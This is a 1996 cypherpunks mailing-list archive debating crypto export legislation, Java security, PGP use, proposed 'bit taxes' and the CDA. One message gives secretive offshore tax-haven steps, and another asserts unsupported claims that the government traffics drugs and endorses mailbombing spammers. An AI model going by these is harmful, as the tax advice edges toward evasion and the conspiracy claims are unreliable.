I sent email today to Senators Burns and Leahy thanking them for their work
on this issue, and I'm asking others who support their efforts to do the
same.  They've got some hard work ahead of them to get this bill through, I
think, and I wanted to let them know their efforts are appreciated.

I also pointed out to Senator Leahy, politely but firmly, my concern over
this provision in the ECPA (which he mentioned in his letter, so I'm
assuming he considers it still on the table):

"Whoever willfully endeavors by means of encryption to obstruct, impede, or
prevent the communication of
information in furtherance to a felony which may be prosecuted in a court of
the United States, to an investigative or law enforcement officer shall- 

"(1) in the case of a first conviction, be sentenced to imprisonment for not
more than 5 years, fined under this title, or both; or 
"(2) in the case of a second or subsequent conviction, be sentenced to
imprisonment for not more than 10 years,
fined under this title, or both."

>]           (2) Miniaturization, disturbed computing, and
>                                 ^^^^^^^^^^^^^^^^^^^^
>]        reduced transmission costs make communication via
>]        electronic networks a reality.
>
>I think "disturbed computing" pretty much sums up this list, if not the
>entire net!  :-)

:)


Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 4 May 1996 13:28:39 +0800
To: perry@piermont.com
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <199605030038.UAA21763@jekyll.piermont.com>
Message-ID: <199605032009.NAA22938@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Perry, perhaps you might be interested in outlining how 
Java designers might incorporate the concept of "defense in 
depth" that allows for even buggy implementations to have
security.

again, your criticisms of it sound like they might potentially
be ameliorated by a secure implementation of Java. remember,
Java is a language, not necessarily an implentation. designers
have some way in the way they actually implement the language.
an implementation with the zillions of firewalls or whatever
you are advocating for the financial industry might actually
emerge. 

but again, the Java designers never claimed that
"Perry Metzger will be able to use Java in his mission critical
funds transfer application". your ranting against it has decreased
noticably in intensity but I don't think it was ever justified
in the first place.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Sat, 4 May 1996 14:35:37 +0800
To: Patrick May <pjm@spe.com>
Subject: Re: SF South Bay: So WhoWhere wants to meet with people interested in online privacy and security...
In-Reply-To: <Pine.GUL.3.93.960502184852.13717T-100000@Networking.Stanford.EDU>
Message-ID: <318A5300.7EED@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


> Rich Graves writes:
>  > For a good demonstration of why WhoWhere? is not necessarily the greatest
>  > thing since spice racks, look up "Louis Freeh," "Fuck You,"...

... making for the funniest Web moment of my week:

	"Want to know more about Fuck You?"


______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Sat, 4 May 1996 13:57:39 +0800
To: cypherpunks@toad.com
Subject: Re: Conrad_Burns@burns.senate.gov: Open Letter to Internet Community From Senator Burns
Message-ID: <2.2.32.19960503184538.00380e00@labg30>
MIME-Version: 1.0
Content-Type: text/plain


At 08:22 PM 5/2/96 -0400, Perry Metzger forwarded the following to the list:
[deleted]
>     In the meantime, I need your help in supporting the effort to repeal 
>     cryptography export controls.  You can find out more by visiting my 
>     web page http://www.senate.gov/~burns/.  There you will find a 
>     collection of encryption education resources that my Webmaster has 
>     assembled.  I trust that the entire Internet community, from the 
>     old-timers to those just starting to learn about encryption, will find 
>     this information useful.
[deleted]
>     Conrad Burns
>     United States Senator

I agree that this could be the single most important piece of legislation to
affect the cypherpunks ever -- firmly defining the legal status of
encryption (and in our favor, no less!)  However, did anyone actually read
it (it's at
http://www.cdt.org/crypto/pro_CODE_bill.html )?  Here's a nice bit of section 2:

]SEC.2.FINDING;PURPOSE
]
]   (a) FINDINGS. - The Congress finds the following:
]          
]           (1) The ability to digitize information makes
]        carrying out tremendous amounts of commerce and 
]        personal communication electronically possible.
]           (2) Miniaturization, disturbed computing, and
                                 ^^^^^^^^^^^^^^^^^^^^
]        reduced transmission costs make communication via
]        electronic networks a reality.

I think "disturbed computing" pretty much sums up this list, if not the
entire net!  :-)

-j
--
J. Deters
>From our _1996_Conflict_of_Interest_Statement_, re: our No Gift policy:
 "If you receive any alcoholic beverages, for example, a bottle of wine,
  you must give the gift to your location Human Resources Manager." 
This memo is from the Senior V.P. of Human Resources.
+---------------------------------------------------------+
| NET:     jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:    1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'33"N by 93^16'42"W Elev. ~=290m (work)     |
| PGP Key ID:  768 / 15FFA875                             |
+---------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 4 May 1996 14:33:01 +0800
To: Victor Boyko <vboykod@eldorado.stern.nyu.edu>
Subject: Re: The Joy of Java
In-Reply-To: <9605031933.AA24575@eldorado.stern.nyu.edu>
Message-ID: <Pine.SUN.3.93.960503140144.8904A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 3 May 1996, Victor Boyko wrote:

> I have been doing work in Java for the past half a year or so (most
> recent project: implementing SSL 3.0). I can't say I don't like it at
> all, but I like C++ much more. Here are my thoughts about the issue.
> Since there is a subjective component to choosing a programming
> language, flamewars are very likely to erupt when you say "Language A
> is much better than Language B", but it may still be interesting to
> read others' opinions.

I agree completely with Victor's analysis.  I usually try to avoid me-too
posts, but I've been meaning to write an explanation of why I haven't
started using Java and am not planning to port my Crypto++ library to
Java, so this saves me the effort.

Wei Dai






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 4 May 1996 11:50:54 +0800
To: perry@piermont.com
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
Message-ID: <01I49T6J284A8Y56P8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: "Perry E. Metzger" <perry@piermont.com>

>It certainly makes me feel more comfortable. The problem I have is
>that I expect that increasingly pages will arise for which information
>can only be extracted with the use of Java. Some flunky from some desk
>will will come up and scream "what do you mean I can't get a copy of
>Foo Corporation's merger press release because we won't run some
>program! Thats bullshit! Do you know how much money the risk arb desk
>pulls in, you twit! This must never happen again! Fix it immediately!"

	Might I suggest setting up another computer with Java enabled, and
_without_ the critical applications? Somehow, I think they can afford an
extra computer for each desk - it wouldn't have to be a high-capability one.
That would also cure having to have Netscape and other high-network-access
programs on the same computers as the critical applications. (Of course, some
of the critical applications may also need to access the Internet... but they
probably wouldn't need http capability.)
	Of course, feel free to tell me that I don't know what I'm talking
about.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 4 May 1996 15:03:50 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <199605031825.LAA16991@netcom8.netcom.com>
Message-ID: <Pine.SOL.3.91.960503144947.8478E-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 3 May 1996, Bill Frantz wrote:

> At  9:03 AM 5/3/96 -0400, Perry E. Metzger wrote:
> >... The problem I have is
> >that I expect that increasingly pages will arise for which information
> >can only be extracted with the use of Java. Some flunky from some desk
> >will will come up and scream "what do you mean I can't get a copy of
> >Foo Corporation's merger press release because we won't run some
> >program! Thats bullshit! Do you know how much money the risk arb desk
> >pulls in, you twit! This must never happen again! Fix it immediately!"
> 
> to sell an OS with strong security features.)  The only thing I can suggest
> to you is, spend the bucks, desk real estate, confusion etc. and have two
> machines; a secure/reliable one and an insecure/unreliable one.  Make sure

As far as I can tell, Perry's requirements are that *no* uncertified "code" 
should be running anywhere inside the firewall, whether it be a java 
applet or a game disk brought in by a temp in settlements.

One application of Solid Oak could be used to help out here; many applets 
are not custom written for a single page, but are instead just instances 
of fairly standard code. If this code is signed for by the software house 
that produced the applet, then the code can be accepted or rejected based 
on a approved vendors list.  This works for most medium security applications

There are situations where this is not enough; normally these 
organisations will have there own security divisions capable of doing 
there own evaluations. In these cases, the local security division could 
sign the code, and the application on the desk be configured to only run 
applets authenticated by the local security team.

Simon
   
---
       We are a bunch of hackers, networked through the soil
       Fighting for the TCP we gained by honest toil
       And when our bytes were threatened, then the cry rose near and far
      "Hurrah for the Buggy GNU Hack that comes in lots of tars"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pierre Oberholzer <Pierre.Oberholzer@PM.CO.CH-GEN.LANDISGYR.LG-CH.CH>      (Tel 022 / 749 36 57)
Date: Sat, 4 May 1996 04:04:27 +0800
To: owner-www-security@ns2.Rutgers.EDU (Non Receipt Notification Requested)
Subject: Re: (fwd) E-Commerce Info. Needed
In-Reply-To: <960503034747_103007.3426_GHU46-1@CompuServe.COM>
Message-ID: <0054131403051996/A13135/PBMS01/11A51B8D3400*@MHS>
MIME-Version: 1.0
Content-Type: text/plain


*   I am writing a paper on electronic commerce, and I wonder if anyone happens to
*   know of interesting URLs addressing the subject, including security issues?
*   If you know of a good location for electronic commerce/security information,
*   please email me directly
*   at the following address:
*   103007.3426@compuserve.com
*   THANKS A LOT!! Sally
*   
If you get any information, please let me know. I am also quite interested in the subject.

Pierre Oberholzer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Victor Boyko <vboykod@eldorado.stern.nyu.edu>
Date: Sat, 4 May 1996 13:04:42 +0800
To: dan@dpcsys.com
Subject: Re: The Joy of Java
In-Reply-To: <Pine.SV4.3.91.960427003947.6962C-100000@cedb>
Message-ID: <9605031933.AA24575@eldorado.stern.nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Dan" == Dan Busarow <dan@dpcsys.com> writes:

    Dan> At Usenix 96 in San Diego it was pointed out that applets are
    Dan> an abberation. This is a complete language designed to
    Dan> displace C++, Visual Basic and other OO languages. Thinking
    Dan> of Java as simpy a Web enhancement tool is short sighted.

    Dan> Personally it is more attractive than C++ for product
    Dan> development and we are trying to get it on FreeBSD, SCO
    Dan> UnixWare and SCO OSR5. Using Java for applets _only_ is like
    Dan> @#$% your mother... Most of us are not into it.

I have been doing work in Java for the past half a year or so (most
recent project: implementing SSL 3.0). I can't say I don't like it at
all, but I like C++ much more. Here are my thoughts about the issue.
Since there is a subjective component to choosing a programming
language, flamewars are very likely to erupt when you say "Language A
is much better than Language B", but it may still be interesting to
read others' opinions.

As I see it, Java as a language is basically (C++) + (garbage
collection) - (templates) - (operator overloading) - (multiple
inheritance) - ... Garbage collection is a very useful thing in many
cases (though in some it may be a great slowdown), but there is no
real reason not to incorporate GC into a C++ implementation, or at
least give the user an option of doing it.

On the other hand, templates are an extremely useful feature, since
they allow huge amounts of code reuse (Wei Dai's crypto++ library is
a great example of the use of templates). They also enable a C++
programmer to do such things as run-time array boundary checking
(refuting one of the traditional arguments about the dangers of C++),
or a type which is a subrange of another. Java programs can have some
template-like functionality through the use of the Object class, but
that is very limited. For instance, compare the following hypothetical
Java code

	List l;
	l.append(new Integer(1));
	l.append(new Integer(2));
	int x = ((Integer)(l.head())).intValue();

with this C++

	List<int> l;
	l.append(1);
	l.append(2);
	int x = l.head();

The second version is clearly more readable. It would also be more
efficient since no run-time conversions would be done.

There are also situations in which templates would work, but Objects
would not. For instance, it is very easy in C++ to make a template
class Range<type, min, max> that would be a subrange [min, max] of
type, and would do run-time checks for any assignments. There is no
way you can do this in Java.

Java also lacks operator overloading. 'V = M*W + A' (where V, W, and A
are vectors, and M is a matrix) is much easier to read than 'V =
Vector.add(Matrix.multiply(M, W), A)'. The same would apply to a big
integer class. 

The lack of multiple inheritance is somewhat alleviated with the use
of interfaces, but there are cases where this is not enough. The
crypto++ library uses a lot of nontrivial multiple inheritance.

Another strange deficiency of Java is that there is only one way to
pass parameters. All class parameters are passed by reference, while
all primitive-type parameters are passed by value. What if you need to
pass an integer by reference? Also, when you pass a class parameter,
the method can modify it arbitrarily, since Java does not allow
constant variables.

As for the usual complaint "C++ has pointers which are unsafe!!!", the
following can be said. First, Java has pointers too: all class objects
are actually pointers to data, so, for instance, "A = B" in Java would
mean "Make A a pointer to the same location as B", not the traditional
meaning "Make A a copy of B". Second, when it is said that C++
pointers are unsafe, usually two things are meant: C++ allows you to
cast a pointer of one type to a pointer of another type, and C++
allows for pointer arithmetic. Both of these features are not needed
in virtually all programs (they were probably retained only for C
compatibility), except those that interface with the low-level system
calls. Also, both of them can only be invoked explicitly. Thus, the
programmer which uses them has only himself to blame if anything goes
wrong.

In summary, I don't see Java as the new great language that is going
to replace C++ in the standalone application arena, even if Java ran
as fast as C++. It is true that Java has a nice standard library
(including threads), but there is no reason whatsoever why a library
with a very similar interface could not be written in C++.

On the other hand, considering Java as a language specifically for
applets is a completely different matter. Here it does not compete
with C++. The competitors -- Safe-Perl, Python, and Safe-TCL (and
perhaps some Scheme-like languages) -- don't stand a chance without
being supported by Netscape.

Thus I would say that Java became so popular for the following
reasons:

- It was developed by Sun.
- It was licensed by Netscape.
- It is C++ -like.
- JDK (and its source) were made freely available.

Constructive comments and discussion of this issue would be
appreciated, but send the flames to /dev/null.

Sincerely,
Victor Boyko

-- 
Victor Boyko <vboykod@is-2.nyu.edu>
http://galt.cs.nyu.edu/students/vb1890/
To get my PGP key, finger or send e-mail with subject "send pgp key".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 4 May 1996 15:05:59 +0800
To: cypherpunks@toad.com
Subject: Re: Has Tim turned anti-PGP?
In-Reply-To: <Pine.BSF.3.91.960503031848.470A-100000@bitbucket.edmweb.com>
Message-ID: <Pine.LNX.3.93.960503152917.190A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 3 May 1996, Steve wrote:

> > Unless the information is "secret," why bother? It adds extra time at his
> > office's end (you don't think Leahy types in his password to PGP do you?),
> > and it accomplishes little.
> 
> I agree with you to this point... Personally, I don't encrypt or even sign
> anything I send out, unless there is a reason to. For most of the mail I
> send out, I don't care if third parties read it, and most of it is so
> unimportant that if it were altered (highly unlikely) I wouldn't care. In
> fact, I can't recall the last time I encrypted a message (but I've signed
> a couple recently).

Since I use UNIX, I have set up the mailing program so that it actually takes
extra effort to not sign something.  I have nothing to lose by signing my
e-mail messages.  Yes, I know that not everyone in the world uses UNIX and
I don't know if there is a transparent mailing interface for Windoze or
Macintosh.  As for encryption, I encrypt a lot of my messages because if I
only encrypted "secret" messages, that would automatically draw suspicion
to every encrypted message that I send.  I also always use ssh to log into my
UNIX shell account.  I know the probability of someone intercepting my
password is low, but again I have nothing to lose.

> Now that's just plain un-cypherpunk of you. If people want to use PGP, let
> them use PGP! There are so many scripts etc. out there to make using PGP
> almost transparent, so decrypting your mail shouldn't be any harder than
> pressing a couple keys and typing in your passphrase. (I know, the
> passphrase is the killer.)

As I said above, there is plenty of integration between PGP and UNIX mailers,
but such is not the case for Windoze and Macintosh.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMYpgfbZc+sv5siulAQFF1QP8DHrxzW3pkBxmHzWqUy5N79f3ECr2JJZa
IFwwFnbj9T5d2ueqG7Ec7sGLk/HE4CfPky4WfZrRzJ3tNYOcgegYdKmvJ7Dv6W8z
A5QSRtDo6YMko43goQgglXzuYDN65sBwwpIHoA6Qm2mjwSykBnmwrUJexOvR0aw9
gYBwt7pLYL0=
=LdvT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 4 May 1996 15:14:42 +0800
To: cypherpunks@toad.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <2.2.32.19960503224906.006ed628@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

At 11:31 AM 5/3/96 -0700, brerrabbit@alpha.c2.org wrote:

>Do tell.  How would someone, just for instance, who is considering
>leaving a "permanent" job for the higher compensation available to
>contractors and consultants be able to structure a business in such a
>way as to benefit from these techniques?  If we assume a rate of
>between $60/hour and $125/hour (typical in Boston, New York, and the
>Silicon Valley), how much can one save?  How much effort and money is
>required?  How much risk is involved?
>
>There are many books on the shelves claiming to show how to avoid
>taxes using these techniques.  Most of them have the smell of
>"dangerous crackpot" about them.  Can you recommend any in particular?

1)  Read as wide a variety of the stuff out there you can 
    (even the books by "dangerous crackpots").  
2)  Take a vacation to a tax haven you like because of what
    you've read about it.
3)  Open a bank account with an established bank.
4)  Ask your banker to recommend a trustworthy lawyer.
5)  Tell the lawyer what you want to accomplish and do
    what he or she says, if it makes sense to you.
6)  DON'T talk to anyone else--especially in your home
    country--about what you have done, are doing or
    are planning to do.
7)  As your resources increase, repeat steps 2-5 in 
    other tax havens.  Don't put all your eggs in one
    basket if you have enough to spread around.

8)  Send me $1000.  If you follow my steps 1-7, you will
    save many times that amount.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 May 1996 12:40:41 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <01I49T6J284A8Y56P8@mbcl.rutgers.edu>
Message-ID: <199605032013.QAA24832@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"E. ALLEN SMITH" writes:
> 	Might I suggest setting up another computer with Java enabled, and
> _without_ the critical applications? Somehow, I think they can afford an
> extra computer for each desk

Money is not a problem, but space is. There is never any room on a
trading floor. Space is at an amazing premium.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Sat, 4 May 1996 15:50:49 +0800
To: cypherpunks@toad.com
Subject: "Bit Tax" proposed by satan@hell.gov
In-Reply-To: <199605031414.KAA32390@osceola.gate.net>
Message-ID: <Pine.BSF.3.91.960503154400.313D-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


>Consumption taxation would, of course,
>include a tax on the amount of information coming into your computer.  I
>don't think that the government will have any problem determining the
>quantity of the information & since it will be encrypted anyway, I don't
>see the privacy worries.

The problem with a tax on data is that it would be *extremely* unfair. 

It would be like a tax on atoms. With a tax on atoms, the tax on a bag of
groceries would be hundreds of times greater than the tax on a diamond
ring, because there are more atoms in a bag of groceries

Bits are the digital equivalent of atoms. With a tax on bits, the tax on
the download of an up-to-date virus scanner would be hundreds of times
greater than the tax on an emailed business contract.

If this bit tax thing were attempted, the amount of time people spend
online would be determined entirely by their income; if you can't afford
the tax, you can't use the net. Conversely, with employment moving to the
net, people's income would be determined by how much time they spend
working on the net. That creates a nasty catch-22; if you can't afford to 
use the net, you can't get a job; and if you can't get a job, you can't 
afford to use the net.

I understand some ISPs currently charge for data, but it's very cheap 
(My company pays around $20 per gigabyte). The amount of taxation needed 
to sustain a government would be hundreds of times greater.

And of course, taxing on data would discourage new technology, since new 
technology usually requires a lot more bandwidth. People wouldn't use the 
new technology because it could easily quadruple (or more) their taxes.

This bit tax idea must have come directly from satan@hell.gov.

======================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)     |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/  |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68 C09EC52443F8830 |
|               -- Disclaimer: JMHO, YMMV, IANAL. --                 |
====================================================================:)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 4 May 1996 14:56:37 +0800
To: cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <199605030525.GAA21397@pangaea.hypereality.co.uk>
Message-ID: <Pine.LNX.3.91.960503161250.2585A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 3 May 1996, Ecafe Mixmaster Remailer wrote:
> > From: Brian D Williams <talon57@well.com>
> > Date: Thu, 2 May 1996 11:16:35 -0700
> > >From cypherpunks-errors@toad.com Tue Apr 30 23:58:28 1996
> > >Date: Wed, 1 May 1996 00:52:03 -0500 (CDT)
> > >From: snow <snow@smoke.suba.com>
         ^^^^^^^^^^^^^^^^^^^^^^^^^^

> > >To: "Perry E. Metzger" <perry@piermont.com>
> > >cc: "L. Detweiler" <vznuri@netcom.com>, cypherpunks@toad.com
> >      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> > Game, set, match......
> 
> No, probably done intentionally.  Note the lower-case snow...

	That would be me. snow@crash.suba.com is an account set up 
expressly for this list, so I didn't bother to set up a complete identy 
for it. I started here after Detweiler did whatever he did. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Sat, 4 May 1996 16:24:53 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)
Subject: Re: Freedom and Security
In-Reply-To: <01I49XXMDSMO8Y56P8@mbcl.rutgers.edu>
Message-ID: <199605032127.RAA04670@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


Rather than repeat the whole argument, I'd like to point out something:

> 	C. As has been pointed out by others, even if actual child pornography
> is on the Net, it is not in and of itself doing any harm to children. It is

> 	D. As has been pointed out, the use of child pornography is a classic
> "Horseman" (of the Four). In other words, the CyberAngels are using child
> pornography as a red herring for their even more objectionable activities.

> to learn the basic lesson of "mind your own business." Bringing goverment into
> the matter may both result in a violation of individual civil liberties and
> may result in increased governmental control over the Internet.

> >The Internet is a city - it needs 911 services and it needs Neighborhood
> >Watches.  And neither professional law enforcement nor neighborhood watch
> >are by definition a threat to anyone's freedom.  Freedom within the context

> >Freedom is under threat from two directions - from selfish individuals who
> >care little for the Community, and from the over zealousness of governments
> >who seek greater and greater control over individual thought and action.

The 'threat' is non-existent - it's no longer a threat, but reality.  Why 
do you think that the government was so desperate to slide the CDA 
through?  Folks like the "CyberAngels" are the best friend of an 
intrusive government - they give them an excuse.

While before the CDA the government could read what they liked over the 
net, they really couldn't do much about it, because if they did, the ACLU 
and friends would've swooped down like a pack of starving dogs and 
devoured them alive (not that that would've been a *bad* thing, mind 
you).  Now, there's no excuse, and nothing to stop them - they have the 
*LAW* on their side.

The CDA just makes it legal.  The government is actually very interested 
in the USPS and others providing service over the net, because it makes 
their jobs a hell of a lot easier.  This "child pornography" argument is 
just a red herring - there has ALWAYS been this type of thing around, and 
always will be.  I notice much is made regarding legislating morality, 
but nothing is being said about the millions of tons of cocaine and 
heroin that the government brings in and sells to folks.  When people 
realize that the drug laws and this absurd "war on drugs" is just to 
drive the competition out of business - well, it's not going to be pretty.
And how about the enormous amounts of money made with the child slavery 
rings?  There is a LOT more of that going on than this "child porno" 
stuff - just ask Interpol.

As to the argument that we need cops and such - well, we did just fine 
for many years self-policing ourselves.  The spammer and such was either 
shouted down with mailbombs or just plain ignored.  Now, Suzie Q. gets an 
account, gets on IRC, and gets messaged by some freshman with no life, 
gets upset, and suddenly it's a federal case, attendant with the press 
smelling blood in the water, the morality cops like CyberAngels coming 
out of the woodwork in an attempt to get press, and the government 
rubbing their collective hands together, knowing that crap like this is 
just one more small step towards a police state.

I heard someone the other day say "what do you call it when only the 
police have guns? - a police state!"  Made me think.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Sat, 4 May 1996 14:50:05 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: ITARs and the Export of Classes and Methods
In-Reply-To: <199605010642.XAA05623@netcom9.netcom.com>
Message-ID: <9605032128.AA00701@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Bill Franz writes:
>  Certain languages, e.g. Smalltalk, and I believe lisp and
>  scheme, have bignums as a built-in type.  (Or more specifically,
>  their integer types are limited in size only by available
>  memory.)  I believe these languages are freely exportable.

The Python programming language has built-in support for multiple bignum  
packages (including the GNU MPZ library).  It also has MD5 built-in.  Andrew  
Kuchling also has written a nice crypto package that gives you access to a  
lot of good crypto primitives.  The language was written in the Netherlands,  
is free to use for any purpose (commercial or otherwise), easily runs on  
EVERYTHING (Mac, DOS, Windoze, NT, just about any flavor of unix, etc...), is  
embeddable, and has a Nutshell book about to be published.  Check it out...


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 4 May 1996 15:25:29 +0800
To: cypherpunks@toad.com
Subject: Bit tax again?
Message-ID: <m0uFUHq-000968C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain



>Europe:  Try to send it, we'll tax your bits
>
>By Peter Clarke

>The EC report reasons that the value of the average cyberspace transaction 
>will increase as time goes by, resulting in fewer physical transactions.  
>The upshot, the report says, will be a shrinking government tax base.  
>Evidence of such a trend may already have surfaced:  Use fo the Internet to 
>import goods and services electronically from outside the continent has 
>allowed some Europeans to avoid payments under Europe's value-added-tax 
>(VAT) system.

This is a poor reason to adopt a so-called "bit tax."  One obvious problem 
is that a 1-kilobyte letter in which I order thousands of dollars worth of 
goods is simply not comparable (in "value")  to a 1-megabyte telephone 
conversation (the amount of data transferred, in one direction, in a 
2-minute phone call.)  If they want to implement a "bit tax" to replace lost 
revenue, they're left with either taxing bits so high that they recoup the 
"lost" revenue in the 1-kbyte letter, or reducing the "bit tax" to the level 
which makes transmission of low-profit items like Internet phone calls, 
GIFs, or audio files possible.  The former won't do any good; the latter is 
totally unacceptable.


Governments may be worried about losing tax revenue, in general, but they 
are (as usual) FOS.  The development of information technology may reduce 
tax revenues, but if it does, it does this by bypassing the use of services 
that would have otherwise been necessary.   To use the example in the 
article, if I buy something over the Internet, as opposed to physically 
driving 20 miles to get it, and it is (efficiently) shipped to me by some 
method such as UPS, that represents a substantial reduction in the amount of 
gas I use, the wear and tear on my car, usage of roads, etc.   _IF_ taxes 
exist to pay for some of these kinds of costs, _if_ a more efficient system 
of product-ordering is developed to eliminate these costs, then (logically) 
the need for those services is reduced.  That means that taxes should drop 
accordingly.

> Soete observed last week that 
>sending his group's report by mail or courier, rather than electronically, 
>would involve taxes on fuel purchases and on the profits fo the companies 
>involved in physically shuttling the document to recipients.  

Soete proves my point.  There is a decreasing need for those delivery 
services, now, so it is logical that costs should be reduced 
proportionately, including taxes.  However, if we look at the situation by 
pessimistically assuming that the government wants to maintain its revenue 
no matter what, it's obvious that Soete's position is "logical" from his 
limited standpoint.  The problem is that carried to its ultimate extreme, if 
technology completely eliminated the need for the services that governments 
currently provide, those same governments would still want the same amount 
of revenue!  This kind of thinking only makes sense to governement employees.

>"As society moves toward the information society, tax revenue needs to shift 
>emphasis from material goods to virtual goods and services," he said.  I 
>think we will see a very rapid introduction [of such a tax structure] in one 
>or two years' time."

This quote seems to assume that tax revenues should be just about as 
constant and unavoidable as death and...uh...taxes.  I would sure like to 
see some hint of recognition that tax revenues SHOULD fall as a consequence 
of technological progress.


>Soete said he believes the tax "can be introduced in a very straightforward 
>way.  Every telephone operator and service provider has a record of the 
>bytes moved.  They can be the tax collectors."

This is probably the most outrageous and hilarious thing he is saying.  If 
anything, practically no software today has any ability to collect the kind 
of information he thinks is already being collected.


>
>He acknowledged the prevailing "negative view about a bit tax" and 
>attributed it in part of "concern that it could inhibit adoption of 
>information technology. 

That's a straw man.  What a "bit tax" would do is to skew the market in 
favor of "low-bit" services, and against high ones.  Sending a GIF or an 
audio file would become cost-prohibitive, while email would stay cheap.  
While, arguably, there are reasons to charge more for more bits (more 
transmission capacity is necessary), the amount of that extra charge would 
probably be exceedingly small if it were "fair."


> But once people have the technology, not many 
>would go back.  Whether the tax is 1 cent per bit or 1 cent per kbit is, of 
>course, completely open."

He completely misunderstands the inability of the system to know the "value" 
of a given transmitted bit, and without this information the only system 
left is a flat tax-per-bit which would be entirely impractical.


